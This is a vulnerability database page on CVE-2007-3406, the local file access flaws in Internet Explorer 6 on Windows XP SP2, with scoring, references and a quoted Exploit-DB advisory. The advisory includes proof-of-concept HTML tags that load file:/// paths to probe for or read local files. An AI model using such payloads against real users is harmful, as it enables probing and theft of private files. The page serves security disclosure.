CVE-2007-3406 : Detail

CVE-2007-3406

29.36%V4
Network
2007-06-26
16h00 +00:00
2008-11-15
09h00 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple absolute path traversal vulnerabilities in Microsoft Internet Explorer 6 on Windows XP SP2 allow remote attackers to access arbitrary local files via the file: URI in the (1) src attribute of a (a) bgsound, (b) input, (c) EMBED, (d) img, or (e) script tag; (2) data attribute of an object tag; (3) value attribute of a param tag; (4) background attribute of a body tag; or (5) the background:url attribute declared in the BODY parameter of a STYLE tag.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:P/I:N/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 29619

Publication date : 2007-02-19 23h00 +00:00
Author : Rajesh Sethumadhavan
EDB Verified : Yes

source: https://www.securityfocus.com/bid/22621/info Microsoft Internet Explorer is reportedly prone to multiple local file-access weaknesses because the application fails to properly handle HTML tags. These issues are triggered when an attacker entices a victim user to visit a malicious website. Initial reports stated that remote attackers may exploit these issues to gain access to local system files via Internet Explorer. This would help attackers steal confidential information and launch further attacks. This attack would occur in the context of the user visiting the malicious site. New conflicting reports indicate that these issues result only in verifying the presence of files on a vulnerable system. These issues affect Internet Explorer 6 on a fully patched Windows XP SP2 system; previous versions and operating systems may also be vulnerable. The following proof-of-concept HTML code is available: - Embed Tag Local file Access: <EMBED SRC="file:///C:/example.pdf" HEIGHT=600 WIDTH=1440></EMBED> - Object & Param Tag Local File Access: <object type="audio/x-mid" data="file:///C:/example.mid" width="200" height="20"> <param name="src" value="file:///C:/example.mid"> <param name="autoStart" value="true"> <param name="autoStart" value="0"> </object> - Body Tag Local File Access: <body background="file:///C:/example.gif" onload="alert('loading body bgrd success')" onerror="alert('loading body bgrd error')"> - Style Tag Local File Access: <STYLE type="text/css">BODY{background:url("file:///C:/example.gif")} </STYLE> - Bgsound Tag Local File Access: <bgsound src="file:///C:/example.mid" id="soundeffect" loop=1 autostart= "true"/> - Input Tag Local File Access: <form> <input type="image" src="file:///C:/example.gif" onload="alert('loading input success')" onerror="alert('loading input error')"> </form> - Image Tag Local File Access: <img src="file:///C:/example.jpg" onload="alert('loading image success')" onerror="alert('loading image error')"> - Script Tag Local File Access: <script src="file:///C:/example.js"></script>

Products Mentioned

Configuraton 0

Microsoft>>Windows_xp >> Version *

Microsoft>>Internet_explorer >> Version 6

References

http://osvdb.org/45435
Tags : vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/22621
Tags : vdb-entry, x_refsource_BID